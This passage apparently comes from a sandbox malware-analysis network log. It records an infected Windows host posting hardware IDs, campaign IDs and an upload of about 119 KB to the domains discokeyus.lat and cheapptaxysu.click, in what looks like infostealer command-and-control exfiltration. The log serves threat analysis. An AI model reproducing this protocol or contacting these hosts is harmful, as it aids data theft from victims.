                                                                                                                                                                                                                                                            Content-Length: 85
                                                                                                                                                                                                                                                            Host: cheapptaxysu.click
                                                                                                                                                                                                                                                            2024-12-21 21:18:29 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 26 6a 3d 26 68 77 69 64 3d 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=CZJvss--geopoxid&j=&hwid=ACBF7AD21FC990D4AC8923850305D13E
                                                                                                                                                                                                                                                            2024-12-21 21:18:30 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:30 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=krhqqobn6p8aiqauk6ehp844og; expires=Wed, 16 Apr 2025 15:05:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpzq8sCHe0VwH04iNFuEBfvj0VHjBqKHEeZyhON0utENB9TUmV0HlT%2BLsUYbYqpo16Jm%2Bdhrts4wgnV5WLv86Ck8Cp%2Fn24jFBs8wXe97paxFNzNgpU37fuHZKDhpOAjS%2FSRp%2BMk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7abb9fe7d14-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2106&min_rtt=2013&rtt_var=821&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1076&delivery_rate=1450571&cwnd=245&unsent_bytes=0&cid=604c5e55cc52f4a4&ts=786&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:30 UTC54INData Raw: 33 30 0d 0a 75 6f 4a 30 52 4e 39 33 50 57 5a 47 4d 4d 6f 36 34 4d 75 70 50 75 36 68 77 32 51 65 4c 55 58 34 6f 4c 79 56 31 75 6f 48 30 71 33 68 33 77 3d 3d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 30uoJ0RN93PWZGMMo64MupPu6hw2QeLUX4oLyV1uoH0q3h3w==
                                                                                                                                                                                                                                                            2024-12-21 21:18:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            69192.168.2.449995104.21.21.99443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:31 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=AQA0XPY0G257Q8YSOM
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1535
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:31 UTC1535OUTData Raw: 2d 2d 41 51 41 30 58 50 59 30 47 32 35 37 51 38 59 53 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 51 41 30 58 50 59 30 47 32 35 37 51 38 59 53 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 51 41 30 58 50 59 30 47 32 35 37 51 38 59 53 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                                                                                                                                                            Data Ascii: --AQA0XPY0G257Q8YSOMContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--AQA0XPY0G257Q8YSOMContent-Disposition: form-data; name="pid"1--AQA0XPY0G257Q8YSOMContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                                                                                                                                                            2024-12-21 21:18:31 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:31 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=2jvuek6emv9g7u6pag49ooshdm; expires=Wed, 16 Apr 2025 15:05:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3XTfDaxih79w8X0Wl5pX9v2BFCPwUgVbT9Sk0vXYobKZkY%2BXQWshrBjw%2FGfYC7h218VQkeN%2BhNkgIMA8%2BPUhfQ6rX0vv1aBkI6yuo%2BJi6UKI9IoTOd02pvHZPfrH78xDtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7b4d8cbefa9-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1811&rtt_var=686&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2450&delivery_rate=1586956&cwnd=140&unsent_bytes=0&cid=c2a6e8df3f5f3aa9&ts=805&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:18:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            70192.168.2.450007104.21.21.99443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:35 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=ZTQIGVNQCXWV4
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 119150
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:35 UTC15331OUTData Raw: 2d 2d 5a 54 51 49 47 56 4e 51 43 58 57 56 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 54 51 49 47 56 4e 51 43 58 57 56 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 54 51 49 47 56 4e 51 43 58 57 56 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 5a 54 51 49 47 56 4e 51 43 58 57
                                                                                                                                                                                                                                                            Data Ascii: --ZTQIGVNQCXWV4Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--ZTQIGVNQCXWV4Content-Disposition: form-data; name="pid"1--ZTQIGVNQCXWV4Content-Disposition: form-data; name="lid"PsFKDg--pablo--ZTQIGVNQCXW
                                                                                                                                                                                                                                                            2024-12-21 21:18:35 UTC15331OUTData Raw: c8 b4 d9 f1 0b b4 84 95 01 e6 47 4c be cc 5d b9 77 9f 1c 75 40 37 da 8f 06 54 f3 9a 05 11 54 56 2e c0 a6 77 2f 70 e3 cf e4 de 8f a3 53 92 33 1e 45 3d 9c 04 37 d7 e7 2a 43 98 af e4 11 5d 9e 4b 5b fd eb 6a ba 07 bf f5 e1 f1 77 a7 6f c9 c5 b1 f9 5e 7f a8 62 72 31 12 2d 19 8b 6e 7b 95 5c 23 0c b9 7e 24 ad 05 33 fc 52 d1 b4 2d 53 dd d3 19 54 fc 15 e8 14 c3 1e 0f 6c d3 5c d2 ce 84 ba 46 01 3f 46 30 4f 35 34 3a b8 b7 e7 77 df 3d 85 06 ff da a2 3b aa cd d5 3a 3a f6 ae ac d6 6c f9 51 0d f1 c7 80 fc 05 c2 b7 c1 25 0e 29 48 e9 e8 6b a4 a6 5b c7 a2 60 f4 a3 92 a6 1e 79 be 38 6c 77 6b 66 76 91 91 95 ce 69 2e 8d 8c 5e 86 b7 d6 7a 8f fa cc b5 6a 36 ce 23 2f a7 6c 7e 19 c1 06 3f 36 e0 79 3d 66 d2 60 54 f8 c2 a8 9c f1 fd c4 ad 42 84 a8 1e 8f 9e e2 d1 4b c7 2e 38 da 8b dd
                                                                                                                                                                                                                                                            Data Ascii: GL]wu@7TTV.w/pS3E=7*C]K[jwo^br1-n{\#~$3R-STl\F?F0O54:w=;::lQ%)Hk[`y8lwkfvi.^zj6#/l~?6y=f`TBK.8
                                                                                                                                                                                                                                                            2024-12-21 21:18:35 UTC15331OUTData Raw: 1f 0e 3e 73 3b 2a cc c7 23 20 a3 a6 2a 9a 96 81 00 24 fd 01 62 ca 12 c1 fa d6 85 c0 de 83 fa 52 e7 9a 40 98 54 8e c0 5e f4 f6 41 29 ca 47 c8 43 1c c3 30 cc 8f e1 c3 18 d0 21 86 ab 63 fd 04 fe ea 12 b5 bf ba c4 2f 01 fa 24 12 a8 4d 57 d7 d0 2e be 04 33 cf a8 b6 00 77 7c 09 92 16 87 05 25 52 b5 8b 57 51 77 72 c3 35 f3 01 e5 49 de a7 89 4e b0 9c a5 b7 de 40 15 74 67 9a 4e 51 eb 07 5a 0f d8 5d 47 71 9c 00 f6 d4 77 4f fe 5f 01 ac 39 57 53 a1 71 7f cd 17 4a 9d fa 7a 75 13 28 87 e6 19 b0 9b c3 ba 98 0a 98 ba b4 7e 7e 63 2d 8d fc aa 02 b8 f1 47 0c c5 82 1d 5b 43 61 06 9a 05 15 8f de c5 d2 29 52 f9 6e 6e c9 5a 8e e7 17 81 9a 63 bb 8f c6 db 03 9c 68 db 54 51 88 c7 e5 27 0c 22 e0 fa ef 39 ed 4b 35 15 ff b8 f9 59 d6 df a3 f9 07 32 80 3a 1e 6c d4 f3 03 60 03 bb ff e5
                                                                                                                                                                                                                                                            Data Ascii: >s;*# *$bR@T^A)GC0!c/$MW.3w|%RWQwr5IN@tgNQZ]GqwO_9WSqJzu(~~c-G[Ca)RnnZchTQ'"9K5Y2:l`
                                                                                                                                                                                                                                                            2024-12-21 21:18:35 UTC15331OUTData Raw: 17 29 28 69 fb 93 be e5 7a 85 eb ff 95 da 55 a0 d9 b4 f6 53 63 9a 7f 45 a6 f3 cf 99 d5 bb 6b e2 8e af 5e 02 65 4a b8 79 44 e9 5e 88 18 20 e1 b1 f1 e1 ec de 4b b1 bd 2c ba 0d 3b c8 b5 cd 6b 90 e7 c8 1a 10 be a6 d2 5e 29 82 25 fd c9 c9 a5 5c 41 f5 23 08 05 7d 0f 37 d7 49 00 f3 14 cc f0 b5 0d 75 32 70 d5 8d 4a e5 6a a1 e2 e8 bd c5 43 58 8f 9d 12 22 19 ed 02 91 be 9f b5 9b 7b 01 f2 1b 89 48 ee a7 aa 9a 55 10 b7 1a 76 ec e4 54 88 6e 8a e8 d5 81 f2 93 c9 0d 02 2f 84 c4 2a 4c 5a 7f ca 9c 2f 5e 85 63 9e 4d dd c4 41 1f 50 e1 a0 11 7d 5a 32 3a bd 7a 2e 95 72 de 61 fd e5 21 9b 88 a1 76 3d 8f 83 8f 0f 31 10 71 22 f2 fd 04 bc 28 3a e4 f3 08 2e 04 f4 a1 ca bd 2e 32 54 28 08 3d 63 57 38 0e a2 21 81 67 d3 e4 4b 0c ed a4 a8 43 f1 bb 4f 0f c5 6f 1f 3f f5 bb 23 28 50 b5 2e
                                                                                                                                                                                                                                                            Data Ascii: )(izUScEk^eJyD^ K,;k^)%\A#}7Iu2pJjCX"{HUvTn/*LZ/^cMAP}Z2:z.ra!v=1q"(:..2T(=cW8!gKCOo?#(P.
                                                                                                                                                                                                                                                            2024-12-21 21:18:35 UTC15331OUTData Raw: fd cf 16 1e 47 c8 39 30 08 40 8b 6e fa 37 31 c1 1f f8 0d c4 c0 76 f1 ad 02 e6 38 ac 99 df 17 10 42 f6 fa df da ce 7a 93 12 fb e2 c4 4f 74 99 49 03 3b 9f 81 00 23 c4 91 c8 d4 20 1f 10 42 82 e4 6a 66 42 5e 69 26 40 c4 cd 34 74 aa 3a 6f 66 65 54 a1 84 d2 ab 76 3b d3 8f d6 70 9c 44 ff 7e 50 00 3e 18 ee 91 06 aa e3 5b 31 6f bc 07 43 59 0e cf 0e be 98 7e f4 2c 8d 11 64 e0 86 e6 a0 a7 7d 4f e7 65 c8 37 82 8b 27 d6 a0 a0 a8 26 83 72 11 c4 35 e4 70 72 fc e7 c8 29 fc 1e e4 b0 2c 18 ae 66 bb 2a 4c 1b ba d6 aa 07 8f fa 6e fb f9 9e 60 5b 57 fa 42 a2 10 48 3b f5 46 f3 0c b2 a1 aa c0 05 13 05 d3 e3 5a 7b 2b 6e 33 ba 81 ce bf 28 37 18 b4 08 46 24 6a fb 4b 25 a3 7c e9 b4 f1 22 a7 03 c5 d5 e1 d0 ca c4 86 e9 0a 41 ea 1e 19 1c 33 61 3f e0 c7 43 61 aa 35 ce ac fc 3d 7e 1c 44
                                                                                                                                                                                                                                                            Data Ascii: G90@n71v8BzOtI;# BjfB^i&@4t:ofeTv;pD~P>[1oCY~,d}Oe7'&r5pr),f*Ln`[WBH;FZ{+n3(7F$jK%|"A3a?Ca5=~D
                                                                                                                                                                                                                                                            2024-12-21 21:18:35 UTC15331OUTData Raw: 38 bf 7b e5 bb d2 e9 32 37 fd 95 67 07 36 d3 a3 e2 60 2a 85 75 b5 12 73 72 49 17 f7 6f 85 a6 a6 49 d2 0a 85 90 cb 96 9d 21 00 64 35 52 fe a9 b1 9b 23 c7 3b da 5e 97 a9 6b 25 30 99 d8 b5 89 28 de 1e 58 18 2d 1c c4 30 1b f4 e6 0e 60 c6 e5 90 36 33 22 72 c3 2e 06 78 37 28 3a a3 49 8d 27 08 41 2e 2a 16 0e 92 45 7a d8 e2 a3 d9 60 59 07 8a 01 c1 2f 75 54 e7 a1 91 32 90 a3 66 2c 7b 7a 1f 2a 7a c3 b0 3c e6 60 03 15 d6 10 c5 3e 72 f4 8a 05 06 17 fe c6 be 22 ca 24 34 a9 b8 78 d5 85 11 a6 19 ae 37 66 cf ec 16 dd dd 46 81 5f a1 63 ae 49 39 d9 7f 84 03 72 7c 9e ac f2 16 c4 73 a0 e2 09 c6 ef 1f 2b 12 da f9 20 bb 6f 7c 47 21 26 94 3e d7 26 f3 db ca 80 f2 d9 aa c8 bc 12 ab 92 76 23 50 18 33 06 45 17 bf 7d 6f 7f ab 0c 84 d8 b2 5e 25 c4 6e bb 65 70 bb f8 6a 2e 30 17 fe e4
                                                                                                                                                                                                                                                            Data Ascii: 8{27g6`*usrIoI!d5R#;^k%0(X-0`63"r.x7(:I'A.*Ez`Y/uT2f,{z*z<`>r"$4x7fF_cI9r|s+ o|G!&>&v#P3E}o^%nepj.0
                                                                                                                                                                                                                                                            2024-12-21 21:18:35 UTC15331OUTData Raw: cd ab d7 fb ae 3a 3c 91 22 25 32 67 ec b7 31 be b3 5c 51 58 73 a3 df 33 9c 60 b4 a8 5e b0 b9 c0 fc de 43 16 f1 16 ed 37 f6 77 48 65 0b cc f7 eb c3 b3 92 4f 6a e7 50 d3 5e e1 91 9b ac 30 f6 c8 d4 5b 29 39 f7 a5 ac ae 6e 4a fc eb d8 a4 ff 6d 54 57 2c 9e b0 bc 32 62 9d 4a 0b 7f 0f 71 f9 c1 76 6d d2 1e 72 2b 00 ee 84 ef 6b 11 38 2a eb 53 e3 01 8e e3 d9 68 2d 74 89 56 62 1f 81 47 bf 71 83 13 20 c8 48 36 68 8d 35 76 c9 97 28 28 1f 58 27 34 1f 88 ec 8b d6 08 3a d4 0f 11 e8 8f cd 6f 8e 44 72 4b d4 93 ba 14 f0 96 e1 95 eb c5 c4 dd 8a 42 54 b3 c9 4c fd f5 e6 8b 48 0f 2d cf 55 94 73 46 6e cd fa fb 90 0f 13 1e ff da bf 1f 9e 43 2a 85 76 d9 fe ee c5 2e c5 1f 47 5d 39 d9 99 98 50 2d b4 88 f2 f6 e0 94 06 be ee a1 ca be 1e 7b cb cc e5 47 80 18 fa db 33 82 81 9d f0 e6 14
                                                                                                                                                                                                                                                            Data Ascii: :<"%2g1\QXs3`^C7wHeOjP^0[)9nJmTW,2bJqvmr+k8*Sh-tVbGq H6h5v((X'4:oDrKBTLH-UsFnC*v.G]9P-{G3
                                                                                                                                                                                                                                                            2024-12-21 21:18:35 UTC11833OUTData Raw: 85 c4 7d 5a f7 29 e4 4b dd aa f4 fd fd 1c d6 fb 57 f7 97 9f 4a 97 be 0c ef 24 29 df 29 e9 12 1e 3c 99 7d 2a 3b 8e b5 2b 38 ce 1a 44 f5 2e 76 a8 de c9 22 3a 12 c2 51 3f f9 39 0d 43 c8 61 7f 25 e0 c6 ab 0d 2a 1d 58 5f 72 fc 80 04 1d 99 21 65 c5 3f 9e c1 b0 6c 1d 06 a1 59 2d 16 60 17 f9 70 a5 12 0b 4c 8a 2f c3 e6 79 90 fc 9f 3f 4d 52 89 7a 72 62 5b 84 c4 85 70 18 47 ba e3 66 c8 8f c9 85 08 e3 c2 b8 63 c7 00 2d 7f b6 64 9c a1 f9 31 ee 4c 05 5a dd e1 58 28 40 1f eb d2 b0 3b 98 84 c0 f5 b9 15 fb da 1e 5a 62 de 08 2d 87 91 2c 58 07 1d 1d c2 14 63 c7 2a 25 5b 7a c7 2b 93 8e 6d dd 07 0d b0 e8 be ea c2 7d 26 b1 b9 ac 09 d2 49 fb ed de 29 bb af b4 ae 93 ae e1 31 bc 33 3c b0 8c 48 07 99 25 6f 35 ee 29 b4 a6 6b a2 9d 56 81 c8 2f 22 76 54 2e 1c 33 45 ca a9 fb 63 3d 05
                                                                                                                                                                                                                                                            Data Ascii: }Z)KWJ$))<}*;+8D.v":Q?9Ca%*X_r!e?lY-`pL/y?MRzrb[pGfc-d1LZX(@;Zb-,Xc*%[z+m}&I)13<H%o5)kV/"vT.3Ec=
                                                                                                                                                                                                                                                            2024-12-21 21:18:37 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=4c3hlt6sqs8tf6eo5ip9l6k3t4; expires=Wed, 16 Apr 2025 15:05:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nSxRbnfAFMkbDpcjSLBBT6mFcb9af1fHu64jzL%2BTzwak%2FL6kbzeidB1EZ52oRF2wvvJyR1EqZBbxy5WOfaRyo6IyF5xbDE1uFaNLsnj%2FiJMrR5exk4%2Bm%2Fpgc4bcAct52fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7ce8a2d4282-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1569&rtt_var=595&sent=53&recv=126&lost=0&retrans=0&sent_bytes=2833&recv_bytes=120392&delivery_rate=1829573&cwnd=252&unsent_bytes=0&cid=fedc3120f49fcb9e&ts=2059&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:18:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            71192.168.2.450020104.21.21.99443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:39 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 82
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:39 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=ACBF7AD21FC990D4AC8923850305D13E
                                                                                                                                                                                                                                                            2024-12-21 21:18:40 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=005ot8r6tj0h2o2lhg142b4dh2; expires=Wed, 16 Apr 2025 15:05:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EXT%2BarWg199puFbOeVvmgUWet6EuwyQJCu34%2F%2BBIEf4fK8VP%2FgqthzNJc1guk0meq8S9S8VPVl4YETw3gHy0%2F33IeB72FtNTZovBV7D9AuS6ZBx0SjuMdS8vfVkHjdeBjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7e8dd7e4339-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1693&rtt_var=639&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=980&delivery_rate=1707602&cwnd=227&unsent_bytes=0&cid=167e03bc7c7eeb2b&ts=807&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:40 UTC214INData Raw: 64 30 0d 0a 65 35 77 51 63 2b 6d 35 33 56 69 73 47 36 69 69 6a 4f 6c 67 50 75 33 55 4e 4c 39 78 31 39 5a 46 4a 4f 41 61 57 49 6c 37 66 44 4d 67 35 7a 49 47 79 34 50 2f 4d 4e 68 76 32 4a 6a 51 78 6a 77 52 33 4f 77 42 6b 55 50 6d 34 32 73 56 30 53 6c 32 75 45 30 67 48 42 54 36 64 69 2f 47 33 62 67 2b 67 6e 37 51 78 36 37 46 51 6c 69 5a 39 67 36 50 58 66 57 7a 5a 78 37 51 5a 33 54 79 57 51 6b 52 51 62 35 34 42 35 33 4a 35 77 53 44 52 34 65 54 74 4e 78 4f 44 4e 7a 68 47 6f 35 41 35 50 68 30 45 72 77 31 4b 2f 30 65 48 56 34 6e 73 32 49 53 68 39 32 79 4e 59 4a 2b 30 4d 65 75 78 55 4a 59 6d 66 59 4f 6a 31 33 31 73 32 63 65 30 47 63 46 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: d0e5wQc+m53VisG6iijOlgPu3UNL9x19ZFJOAaWIl7fDMg5zIGy4P/MNhv2JjQxjwR3OwBkUPm42sV0Sl2uE0gHBT6di/G3bg+gn7Qx67FQliZ9g6PXfWzZx7QZ3TyWQkRQb54B53J5wSDR4eTtNxODNzhGo5A5Ph0Erw1K/0eHV4ns2ISh92yNYJ+0MeuxUJYmfYOj131s2ce0GcF
                                                                                                                                                                                                                                                            2024-12-21 21:18:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            72192.168.2.450079172.67.209.202443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:10 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
